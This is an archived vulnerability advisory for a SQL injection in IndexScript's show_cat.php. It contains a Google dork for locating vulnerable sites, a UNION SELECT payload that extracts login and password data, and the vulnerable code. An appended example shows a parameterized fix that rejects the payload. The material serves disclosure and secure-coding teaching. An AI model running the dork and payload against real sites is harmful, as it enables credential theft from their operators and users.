seebug | Root | SSV:64820
History: Jul 01, 2014 - 12:00 a.m.

IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability

2014-07-01 00:00:00
Root
www.seebug.org

No description provided by source.


Site: http://indexscript.com
Found By: xssvgamer

Google Dork: allintext: "This site is powered by IndexScript"

exploit:

http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

Blind SQL injection in IndexScript.

Vulnerable code:
// cat_id from the query string is concatenated, unquoted, into the WHERE clause
$sql = "select name, meta_title, meta_description, meta_keywords from dir_cat where " .
 "cat_id=" . fnpreparesql($_GET['cat_id']);

# milw0rm.com [2007-07-25]
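
Hardened form of the category lookup shown above, as an added example (not IndexScript's code and not part of the original advisory). The function name fetch_category, the PDO/SQLite in-memory database and the sample row are assumptions made so the script runs offline; table and column names are taken from the advisory.

```php
<?php
// Added example. Assumption: the body of fnpreparesql() is not shown on the
// page; because cat_id sits in a numeric (unquoted) context, escaping quotes
// would not be enough, so the value is validated as an integer and bound.

function fetch_category(PDO $db, $rawCatId): ?array
{
    // Accept only a positive integer; anything else never reaches the database.
    $catId = filter_var($rawCatId, FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 1]]);
    if ($catId === false) {
        return null; // caller should answer 400/404 instead of querying
    }

    // Bound parameter: the value is never concatenated into the SQL text.
    $stmt = $db->prepare(
        'SELECT name, meta_title, meta_description, meta_keywords
           FROM dir_cat WHERE cat_id = :cat_id'
    );
    $stmt->bindValue(':cat_id', $catId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed schema and data (hypothetical, for the demonstration only).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE dir_cat (cat_id INTEGER PRIMARY KEY, name TEXT,
           meta_title TEXT, meta_description TEXT, meta_keywords TEXT)');
$db->exec("INSERT INTO dir_cat VALUES (1, 'News', 'News', 'News sites', 'news')");

// Inputs: one valid id, the string from the advisory, two constructed ones.
$inputs = [
    '1',
    '-1 UNION ALL SELECT login,password FROM dir_login /*',
    '1 OR 1=1',
    'abc',
];
foreach ($inputs as $in) {
    $row = fetch_category($db, $in);
    printf("%-55s => %s\n", $in, $row ? $row['name'] : 'rejected');
}
```

Only the first input returns a row; the other three fail integer validation and no query is issued for them.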